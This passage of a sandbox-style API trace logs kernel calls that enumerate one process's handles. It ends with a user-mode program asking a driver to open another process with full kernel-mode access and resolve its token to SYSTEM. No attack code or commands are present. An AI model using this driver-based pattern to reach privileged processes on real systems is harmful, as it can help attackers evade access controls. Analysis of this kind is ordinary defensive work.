(ApcState=0xffffd000b1b8e400) [0264.935] PsReleaseProcessExitSynchronization () returned 0x2 [0264.935] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40012 [0264.935] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.935] ObfDereferenceObject (Object=0xffffe0006a4975a0) returned 0x800b [0264.935] IoCompleteRequest () returned 0x0 [0264.935] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.935] PsAcquireProcessExitSynchronization () returned 0x0 [0264.935] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.935] ObReferenceObjectByHandle (in: Handle=0x7c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a0afe70, HandleInformation=0x0) returned 0x0 [0264.935] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.935] PsReleaseProcessExitSynchronization () returned 0x2 [0264.935] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40011 [0264.935] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.935] ObfDereferenceObject (Object=0xffffe0006a0afe70) returned 0x8019 [0264.935] IoCompleteRequest () returned 0x0 [0264.935] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.935] PsAcquireProcessExitSynchronization () returned 0x0 [0264.935] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.935] ObReferenceObjectByHandle (in: Handle=0x7d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a0ac510, HandleInformation=0x0) returned 0x0 [0264.935] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.935] PsReleaseProcessExitSynchronization () returned 0x2 [0264.935] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40010 [0264.935] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.935] ObfDereferenceObject (Object=0xffffe0006a0ac510) returned 0x800f [0264.936] IoCompleteRequest () returned 0x0 [0264.936] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.936] PsAcquireProcessExitSynchronization () returned 0x0 [0264.936] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.936] ObReferenceObjectByHandle (in: Handle=0x7d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a0b02a0, HandleInformation=0x0) returned 0x0 [0264.936] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.936] PsReleaseProcessExitSynchronization () returned 0x2 [0264.936] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4000f [0264.936] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.936] ObfDereferenceObject (Object=0xffffe0006a0b02a0) returned 0x8019 [0264.936] IoCompleteRequest () returned 0x0 [0264.936] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.936] PsAcquireProcessExitSynchronization () returned 0x0 [0264.936] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.936] ObReferenceObjectByHandle (in: Handle=0x7d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a0aa990, HandleInformation=0x0) returned 0x0 [0264.936] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.936] PsReleaseProcessExitSynchronization () returned 0x2 [0264.936] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4000e [0264.936] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.936] ObfDereferenceObject (Object=0xffffe0006a0aa990) returned 0x800f [0264.936] IoCompleteRequest () returned 0x0 [0264.936] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.936] PsAcquireProcessExitSynchronization () returned 0x0 [0264.936] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.936] ObReferenceObjectByHandle (in: Handle=0x7dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a0b2f20, HandleInformation=0x0) returned 0x0 [0264.936] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.936] PsReleaseProcessExitSynchronization () returned 0x2 [0264.936] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4000d [0264.936] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.936] ObfDereferenceObject (Object=0xffffe0006a0b2f20) returned 0x8019 [0264.936] IoCompleteRequest () returned 0x0 [0264.936] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.936] PsAcquireProcessExitSynchronization () returned 0x0 [0264.936] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.936] ObReferenceObjectByHandle (in: Handle=0x7e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069dd1790, HandleInformation=0x0) returned 0x0 [0264.936] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.936] PsReleaseProcessExitSynchronization () returned 0x2 [0264.936] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4000c [0264.936] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.936] ObfDereferenceObject (Object=0xffffe00069dd1790) returned 0x800b [0264.936] IoCompleteRequest () returned 0x0 [0264.936] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.936] PsAcquireProcessExitSynchronization () returned 0x0 [0264.937] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.937] ObReferenceObjectByHandle (in: Handle=0x7e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00073222f20, HandleInformation=0x0) returned 0x0 [0264.937] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.937] PsReleaseProcessExitSynchronization () returned 0x2 [0264.937] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4000b [0264.937] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.937] ObfDereferenceObject (Object=0xffffe00073222f20) returned 0x8018 [0264.937] IoCompleteRequest () returned 0x0 [0264.937] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.937] PsAcquireProcessExitSynchronization () returned 0x0 [0264.937] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.937] ObReferenceObjectByHandle (in: Handle=0x81c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000788b54f0, HandleInformation=0x0) returned 0x0 [0264.937] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.937] PsReleaseProcessExitSynchronization () returned 0x2 [0264.937] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4000a [0264.937] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.937] ObfDereferenceObject (Object=0xffffe000788b54f0) returned 0x800f [0264.937] IoCompleteRequest () returned 0x0 [0264.937] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.937] PsAcquireProcessExitSynchronization () returned 0x0 [0264.937] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.937] ObReferenceObjectByHandle (in: Handle=0x820, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a4a28a0, HandleInformation=0x0) returned 0x0 [0264.937] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.937] PsReleaseProcessExitSynchronization () returned 0x2 [0264.937] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40009 [0264.937] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.937] ObfDereferenceObject (Object=0xffffe0006a4a28a0) returned 0x800f [0264.937] IoCompleteRequest () returned 0x0 [0264.937] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.937] PsAcquireProcessExitSynchronization () returned 0x0 [0264.937] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.937] ObReferenceObjectByHandle (in: Handle=0x87c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a0c8f20, HandleInformation=0x0) returned 0x0 [0264.937] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.937] PsReleaseProcessExitSynchronization () returned 0x2 [0264.937] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40008 [0264.937] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.937] ObfDereferenceObject (Object=0xffffe0006a0c8f20) returned 0x7ffc [0264.937] IoCompleteRequest () returned 0x0 [0264.937] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.937] PsAcquireProcessExitSynchronization () returned 0x0 [0264.937] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.937] ObReferenceObjectByHandle (in: Handle=0x88c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a06bc30, HandleInformation=0x0) returned 0x0 [0264.938] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.938] PsReleaseProcessExitSynchronization () returned 0x2 [0264.938] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40007 [0264.938] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.938] ObfDereferenceObject (Object=0xffffe0006a06bc30) returned 0x800f [0264.938] IoCompleteRequest () returned 0x0 [0264.938] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.938] PsAcquireProcessExitSynchronization () returned 0x0 [0264.938] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.938] ObReferenceObjectByHandle (in: Handle=0x890, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a650930, HandleInformation=0x0) returned 0x0 [0264.938] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.938] PsReleaseProcessExitSynchronization () returned 0x2 [0264.938] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40006 [0264.938] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.938] ObfDereferenceObject (Object=0xffffe0006a650930) returned 0x8005 [0264.938] IoCompleteRequest () returned 0x0 [0264.938] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.938] PsAcquireProcessExitSynchronization () returned 0x0 [0264.938] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.938] ObReferenceObjectByHandle (in: Handle=0x8a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a4d1a30, HandleInformation=0x0) returned 0x0 [0264.938] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.938] PsReleaseProcessExitSynchronization () returned 0x2 [0264.938] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40005 [0264.938] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.938] ObfDereferenceObject (Object=0xffffe0006a4d1a30) returned 0x7fff [0264.938] IoCompleteRequest () returned 0x0 [0264.938] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.938] PsAcquireProcessExitSynchronization () returned 0x0 [0264.938] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.938] ObReferenceObjectByHandle (in: Handle=0x8b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a720090, HandleInformation=0x0) returned 0x0 [0264.938] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.938] PsReleaseProcessExitSynchronization () returned 0x2 [0264.938] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40004 [0264.938] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.938] ObfDereferenceObject (Object=0xffffe0006a720090) returned 0x7ffe [0264.938] IoCompleteRequest () returned 0x0 [0264.938] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.938] PsAcquireProcessExitSynchronization () returned 0x0 [0264.938] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.938] ObReferenceObjectByHandle (in: Handle=0x8cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a24c70, HandleInformation=0x0) returned 0x0 [0264.938] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.938] PsReleaseProcessExitSynchronization () returned 0x2 [0264.938] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40003 [0264.938] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.938] ObfDereferenceObject (Object=0xffffe00069a24c70) returned 0x8006 [0264.939] IoCompleteRequest () returned 0x0 [0264.939] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.939] PsAcquireProcessExitSynchronization () returned 0x0 [0264.939] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.939] ObReferenceObjectByHandle (in: Handle=0x8dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a6fd580, HandleInformation=0x0) returned 0x0 [0264.939] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.939] PsReleaseProcessExitSynchronization () returned 0x2 [0264.939] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40002 [0264.939] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.939] ObfDereferenceObject (Object=0xffffe0006a6fd580) returned 0x8006 [0264.939] IoCompleteRequest () returned 0x0 [0264.939] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.939] PsAcquireProcessExitSynchronization () returned 0x0 [0264.939] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.939] ObReferenceObjectByHandle (in: Handle=0x8f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a730c00, HandleInformation=0x0) returned 0x0 [0264.939] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.939] PsReleaseProcessExitSynchronization () returned 0x2 [0264.939] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40001 [0264.939] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.939] ObfDereferenceObject (Object=0xffffe0006a730c00) returned 0x8006 [0264.939] IoCompleteRequest () returned 0x0 [0264.939] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.939] PsAcquireProcessExitSynchronization () returned 0x0 [0264.939] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.939] ObReferenceObjectByHandle (in: Handle=0x908, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a731090, HandleInformation=0x0) returned 0x0 [0264.939] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.939] PsReleaseProcessExitSynchronization () returned 0x2 [0264.939] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x40000 [0264.939] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.939] ObfDereferenceObject (Object=0xffffe0006a731090) returned 0x8006 [0264.939] IoCompleteRequest () returned 0x0 [0264.939] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.939] PsAcquireProcessExitSynchronization () returned 0x0 [0264.939] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.939] ObReferenceObjectByHandle (in: Handle=0x918, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a077f20, HandleInformation=0x0) returned 0x0 [0264.939] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.939] PsReleaseProcessExitSynchronization () returned 0x2 [0264.939] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffff [0264.939] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.939] ObfDereferenceObject (Object=0xffffe0006a077f20) returned 0x8006 [0264.939] IoCompleteRequest () returned 0x0 [0264.939] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.939] PsAcquireProcessExitSynchronization () returned 0x0 [0264.940] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.940] ObReferenceObjectByHandle (in: Handle=0x928, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fd1a30, HandleInformation=0x0) returned 0x0 [0264.940] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.940] PsReleaseProcessExitSynchronization () returned 0x2 [0264.940] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fffe [0264.940] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.940] ObfDereferenceObject (Object=0xffffe00069fd1a30) returned 0x8006 [0264.940] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.940] PsAcquireProcessExitSynchronization () returned 0x0 [0264.940] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000b1b8e400) [0264.940] ObReferenceObjectByHandle (in: Handle=0x944, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a50d8c0, HandleInformation=0x0) returned 0x0 [0264.940] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.940] PsReleaseProcessExitSynchronization () returned 0x2 [0264.940] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fffd [0264.940] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.940] ObfDereferenceObject (Object=0xffffe0006a50d8c0) returned 0x800e [0264.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x180 [0264.940] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.940] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006985a840, HandleInformation=0x0) returned 0x0 [0264.940] ObOpenObjectByPointer (in: Object=0xffffe0006985a840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.940] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x5000e [0264.940] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.940] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.940] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.940] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.941] CloseHandle (hObject=0x1a8) returned 1 [0264.941] CloseHandle (hObject=0x180) returned 1 [0264.942] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.942] PsAcquireProcessExitSynchronization () returned 0x0 [0264.942] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000b1b8e400) [0264.942] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: 